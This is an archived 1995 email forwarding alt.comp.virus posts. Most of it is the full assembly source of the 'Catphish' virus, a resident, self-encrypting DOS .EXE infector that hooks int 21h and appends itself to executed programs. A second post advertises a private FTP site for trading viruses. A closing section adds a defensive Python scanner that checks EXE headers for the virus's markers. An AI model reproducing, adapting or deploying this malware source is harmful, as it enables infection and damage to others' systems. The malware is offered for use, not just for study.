catphish.asm
From smtp Sun Jan 29 16:25 EST 1995
Received: from ids.net by POBOX.jwu.edu; Sun, 29 Jan 95 16:25 EST
Date: Sun, 29 Jan 1995 16:18:52 -0500 (EST)
From: ids.net!JOSHUAW (JOSHUAW)
To: pobox.jwu.edu!joshuaw
Content-Length: 11874
Content-Type: text
Message-Id: <950129161852.10074@ids.net>
Status: RO
To: joshuaw@pobox.jwu.edu
Subject: (fwd) CATPHISH.ASM
Newsgroups: alt.comp.virus
Path: paperboy.ids.net!uunet!cs.utexas.edu!uwm.edu!msunews!news.mtu.edu!news.mtu.edu!not-for-mail
From: jdmathew@mtu.edu (Icepick)
Newsgroups: alt.comp.virus
Subject: CATPHISH.ASM
Date: 26 Jan 1995 13:06:15 -0500
Organization: Michigan Technological University
Lines: 486
Message-ID: <3g8oan$54g@maxwell11.ee>
NNTP-Posting-Host: maxwell11.ee.mtu.edu
X-Newsreader: TIN [version 1.2 PL1]

name VIRUSTEST titlecode segment assume cs:code, ds:code, es:code org 100h;-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+; The Catphish Virus.;; The Catphish virus is a resident .EXE infector.; Size: 678 bytes (decimal).; No activation (bomb).; Saves date and file attributes.;; If assembling, check_if_resident jump must be marked over; with nop after first execution (first execution will hang; system).;; *** Source is made available to learn from, not to; change author's name and claim credit! ***start: call setup ; Find "delta offset".setup: pop bp sub bp, offset setup-100h jmp check_if_resident ; See note above about jmp!pre_dec_em: mov bx,offset infect_header-100h add bx,bp mov cx,endcrypt-infect_headerror_em: mov dl,byte ptr cs:[bx] ror dl,1 ; Decrypt virus code mov byte ptr cs:[bx],dl ; by rotating right.
inc bx loop ror_em jmp check_if_resident;--------------------------------- Infect .EXE header -----------------------; The .EXE header modifying code below is my reworked version of; Dark Angel's code found in his Phalcon/Skism virus guides.infect_header: push bx push dx push ax mov bx, word ptr [buffer+8-100h] ; Header size in paragraphs ; ^---make sure you don't destroy the file handle mov cl, 4 ; Multiply by 16. Won't shl bx, cl ; work with headers > 4096 ; bytes. Oh well! sub ax, bx ; Subtract header size from sbb dx, 0 ; file size ; Now DX:AX is loaded with file size minus header size mov cx, 10h ; DX:AX/CX = AX Remainder DX div cx mov word ptr [buffer+14h-100h], dx ; IP Offset mov word ptr [buffer+16h-100h], ax ; CS Displacement in module mov word ptr [buffer+0Eh-100h], ax ; Paragraph disp. SS mov word ptr [buffer+10h-100h], 0A000h ; Starting SP pop ax pop dx add ax, endcode-start ; add virus size cmp ax, endcode-start jb fix_fault jmp execontwar_cry db 'Cry Havoc, and let slip the Dogs of War!',0v_name db '[Catphish]',0 ; Virus name.v_author db 'FirstStrike',0 ; Me.v_stuff db 'Kraft!',0fix_fault: add dx,1dexecont: push ax mov cl, 9 shr ax, cl ror dx, cl stc adc dx, ax pop ax and ah, 1 mov word ptr [buffer+4-100h], dx ; Fix-up the file size in mov word ptr [buffer+2-100h], ax ; the EXE header. pop bx retn ; Leave subroutine;----------------------------------------------------------------------------check_if_resident: push es xor ax,ax mov es,ax cmp word ptr es:[63h*4],0040h ; Check to see if virus jnz grab_da_vectors ; is already resident jmp exit_normal ; by looking for a 40h ; signature in the int 63h ; offset section of ; interrupt table.grab_da_vectors: mov ax,3521h ; Store original int 21h int 21h ; vector pointer. 
mov word ptr cs:[bp+dos_vector-100h],bx mov word ptr cs:[bp+dos_vector+2-100h],esload_high: push dsfind_chain: ; Load high routine that ; uses the DOS internal mov ah,52h ; table function to find int 21h ; start of MCB and then ; scales up chain to mov ds,es: word ptr [bx-2] ; find top. (The code assume ds:nothing ; is long, but it is the ; only code that would xor si,si ; work when an infected ; .EXE was to be loadedMiddle_check: ; into memory. cmp byte ptr ds:[0],'M' jne Check4lastadd_one: mov ax,ds add ax,ds:[3] inc ax mov ds,ax jmp Middle_checkCheck4last: cmp byte ptr ds:[0],'Z' jne Error mov byte ptr ds:[0],'M' sub word ptr ds:[3],(endcode-start+15h)/16h+1 jmp add_oneerror: mov byte ptr ds:[0],'Z' mov word ptr ds:[1],008h mov word ptr ds:[3],(endcode-start+15h)/16h+1 push ds pop ax inc ax push ax pop esmove_virus_loop: mov bx,offset start-100h ; Move virus into carved add bx,bp ; out location in memory. mov cx,endcode-start push bp mov bp,0000hmove_it: mov dl, byte ptr cs:[bx] mov byte ptr es:[bp],dl inc bp inc bx loop move_it pop bphook_vectors: mov ax,2563h ; Hook the int 21h vector mov dx,0040h ; which means it will int 21h ; point to virus code in ; memory. mov ax,2521h mov dx,offset virus_attack-100h push es pop ds int 21h pop dsexit_normal: ; Return control to pop es ; infected .EXE mov ax, es ; (Dark Angle code.) add ax, 10h add word ptr cs:[bp+OrigCSIP+2-100h], ax cli add ax, word ptr cs:[bp+OrigSSSP+2-100h] mov ss, ax mov sp, word ptr cs:[bp+OrigSSSP-100h] sti xor ax,ax xor bp,bpendcrypt label byte db 0eahOrigCSIP dd 0fff00000hOrigSSSP dd ?exe_attrib dw ?date_stamp dw ?time_stamp dw ?dos_vector dd ?buffer db 18h dup(?) 
; .EXE header buffer.;----------------------------------------------------------------------------virus_attack proc far assume cs:code,ds:nothing, es:nothing cmp ax,4b00h ; Infect only on file jz run_kill ; executions.leave_virus: jmp dword ptr cs:[dos_vector-100h]run_kill: call infectexe jmp leave_virusinfectexe: ; Same old working horse push ax ; routine that infects push bx ; the selected file. push cx push es push dx push ds mov cx,64d mov bx,dxfindname: cmp byte ptr ds:[bx],'.' jz o_k inc bx loop findnamepre_get_out: jmp get_outo_k: cmp byte ptr ds:[bx+1],'E' ; Searches for victims. jnz pre_get_out cmp byte ptr ds:[bx+2],'X' jnz pre_get_out cmp byte ptr ds:[bx+3],'E' jnz pre_get_outgetexe: mov ax,4300h call dosit mov word ptr cs:[exe_attrib-100h],cx mov ax,4301h xor cx,cx call dositexe_kill: mov ax,3d02h call dosit xchg bx,ax mov ax,5700h call dosit mov word ptr cs:[time_stamp-100h],cx mov word ptr cs:[date_stamp-100h],dx push cs pop ds mov ah,3fh mov cx,18h mov dx,offset buffer-100h call dosit cmp word ptr cs:[buffer+12h-100h],1993h ; Looks for virus marker jnz infectforsure ; of 1993h in .EXE jmp close_it ; header checksum ; position.infectforsure: call move_f_ptrfar push ax push dx call store_header pop dx pop ax call infect_header push bx push cx push dx mov bx,offset infect_header-100h mov cx,(endcrypt)-(infect_header)rol_em: ; Encryption via mov dl,byte ptr cs:[bx] ; rotating left. 
rol dl,1 mov byte ptr cs:[bx],dl inc bx loop rol_em pop dx pop cx pop bx mov ah,40h mov cx,endcode-start mov dx,offset start-100h call dosit mov word ptr cs:[buffer+12h-100h],1993h call move_f_ptrclose mov ah,40h mov cx,18h mov dx,offset buffer-100h call dosit mov ax,5701h mov cx,word ptr cs:[time_stamp-100h] mov dx,word ptr cs:[date_stamp-100h] call dositclose_it: mov ah,3eh call dositget_out: pop ds pop dxset_attrib: mov ax,4301h mov cx,word ptr cs:[exe_attrib-100h] call dosit pop es pop cx pop bx pop ax retn;---------------------------------- Call to DOS int 21h ---------------------dosit: ; DOS function call code. pushf call dword ptr cs:[dos_vector-100h] retn;----------------------------------------------------------------------------;-------------------------------- Store Header -----------------------------store_header: les ax, dword ptr [buffer+14h-100h] ; Save old entry point mov word ptr [OrigCSIP-100h], ax mov word ptr [OrigCSIP+2-100h], es les ax, dword ptr [buffer+0Eh-100h] ; Save old stack mov word ptr [OrigSSSP-100h], es mov word ptr [OrigSSSP+2-100h], ax retn;---------------------------------------------------------------------------;---------------------------------- Set file pointer ------------------------move_f_ptrfar: ; Code to move file pointer. 
mov ax,4202h jmp short move_fmove_f_ptrclose: mov ax,4200hmove_f: xor dx,dx xor cx,cx call dosit retn;----------------------------------------------------------------------------endcode label byteendpcode endsend start

From smtp Fri Jan 27 13:23 EST 1995
Received: from ids.net by POBOX.jwu.edu; Fri, 27 Jan 95 13:23 EST
Date: Fri, 27 Jan 1995 13:21:38 -0500 (EST)
From: ids.net!JOSHUAW (JOSHUAW)
To: pobox.jwu.edu!joshuaw
Content-Length: 1179
Content-Type: binary
Message-Id: <950127132138.b52b@ids.net>
Status: RO
To: joshuaw@pobox.jwu.edu
Subject: (fwd) Private Virii FTP Site
Newsgroups: alt.comp.virus
Path: paperboy.ids.net!uunet!nntp.crl.com!crl12.crl.com!not-for-mail
From: yojimbo@crl.com (Douglas Mauldin)
Newsgroups: alt.comp.virus
Subject: Private Virii FTP Site
Date: 24 Jan 1995 22:01:53 -0800
Organization: CRL Dialup Internet Access (415) 705-6060 [Login: guest]
Lines: 14
Message-ID: <3g4pgh$ka2@crl12.crl.com>
NNTP-Posting-Host: crl12.crl.com
X-Newsreader: TIN [version 1.2 PL2]

I run THe QUaRaNTiNE, a private FTP site for viral researchers/coders. I'm always on the lookout for new viral material. If you'd like access, or like to trade, email me a list of your collection. Serious inquiries only.
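As an added defender-side example (not code from the Catphish post or its author): a Python scanner that checks a DOS MZ header for the traces the infect_header routine in the post above leaves behind, namely the 0x1993 value written into the checksum field, the SS=CS / SP=0xA000 stack setup, and an entry point sitting exactly 678 bytes (the stated virus size) before the end of the load image. The two sample headers are constructed here, not taken from real files; MZ field names follow the standard header layout.

```python
import struct

# Offsets in the 24-byte DOS MZ header that the post's infect_header routine
# reads and rewrites (0x02 e_cblp, 0x04 e_cp, 0x08 e_cparhdr, 0x0E e_ss,
# 0x10 e_sp, 0x12 e_csum, 0x14 e_ip, 0x16 e_cs).
CATPHISH_MARKER = 0x1993   # value the post's code stores in the checksum field
CATPHISH_SP = 0xA000       # initial SP the post's infect_header routine sets
CATPHISH_SIZE = 678        # appended code size stated in the post's comment block

def parse_mz_header(data: bytes) -> dict:
    """Return the MZ header fields relevant to the infection as a dict."""
    if len(data) < 0x18 or data[:2] != b"MZ":
        raise ValueError("not a DOS MZ executable")
    names = ("e_cblp", "e_cp", "e_cparhdr", "e_ss", "e_sp", "e_csum", "e_ip", "e_cs")
    return dict(zip(names, struct.unpack_from("<HH2xH4xHHHHH", data, 2)))

def image_length(hdr: dict) -> int:
    """Load-image length in bytes as DOS derives it from e_cp / e_cblp."""
    if hdr["e_cblp"]:
        return (hdr["e_cp"] - 1) * 512 + hdr["e_cblp"]
    return hdr["e_cp"] * 512

def scan_for_catphish(data: bytes) -> list:
    """Heuristic header checks for the traits the post's code leaves behind."""
    hdr = parse_mz_header(data)
    findings = []
    if hdr["e_csum"] == CATPHISH_MARKER:
        findings.append("checksum field holds the 0x1993 infection marker")
    if hdr["e_sp"] == CATPHISH_SP and hdr["e_ss"] == hdr["e_cs"]:
        findings.append("stack segment equals code segment with SP=0xA000")
    entry = hdr["e_cparhdr"] * 16 + hdr["e_cs"] * 16 + hdr["e_ip"]
    if image_length(hdr) - entry == CATPHISH_SIZE:
        findings.append("entry point sits exactly 678 bytes before end of image")
    return findings

# Constructed sample headers (not real files): one with the fields the post's
# code would write for a 1024-byte host with a 32-byte header, one untouched.
INFECTED_SAMPLE = struct.pack("<2sHHHHHHHHHHH", b"MZ", 166, 4, 0, 2, 0, 0xFFFF,
                              62, 0xA000, 0x1993, 0, 62)
CLEAN_SAMPLE = struct.pack("<2sHHHHHHHHHHH", b"MZ", 0, 2, 0, 2, 0, 0xFFFF,
                           0x10, 0x100, 0, 0, 0)

if __name__ == "__main__":
    for label, sample in (("infected", INFECTED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(label, scan_for_catphish(sample) or ["no Catphish traits"])
```

Any single finding is weak on its own (a legitimate linker can leave arbitrary values in the checksum field), so treat a hit as a reason to inspect the tail of the file, not as a verdict.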